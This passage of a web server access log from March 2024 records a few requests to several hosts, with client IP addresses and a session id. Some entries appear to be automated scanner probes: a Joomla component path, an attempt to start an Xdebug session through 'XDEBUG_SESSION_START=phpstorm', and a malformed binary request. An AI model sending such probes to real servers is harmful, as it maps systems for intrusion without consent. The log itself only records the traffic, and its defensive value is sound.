[23/Mar/2024:23:49:22 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 101.44.248.221 - - [23/Mar/2024:23:56:44 +0100] "GET /index.php?sid=e02e0372fc88ea996e8834de7f9f79ef HTTP/1.1" 200 274 "http://triadian.castlegem.co.uk/index.php?sid=e02e0372fc88ea996e8834de7f9f79ef" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 101.44.248.49 - - [24/Mar/2024:00:16:39 +0100] "GET /robots.txt HTTP/1.1" 404 298 "http://food-and-drink.vienna-lodgings.at/robots.txt" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 185.170.144.3 - - [24/Mar/2024:00:32:41 +0100] "\x03" 400 383 "-" "-" 91.90.120.193 - - [24/Mar/2024:00:50:45 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:64.0) Gecko/20100101 Firefox/64.0" 83.97.73.245 - - [24/Mar/2024:00:52:32 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"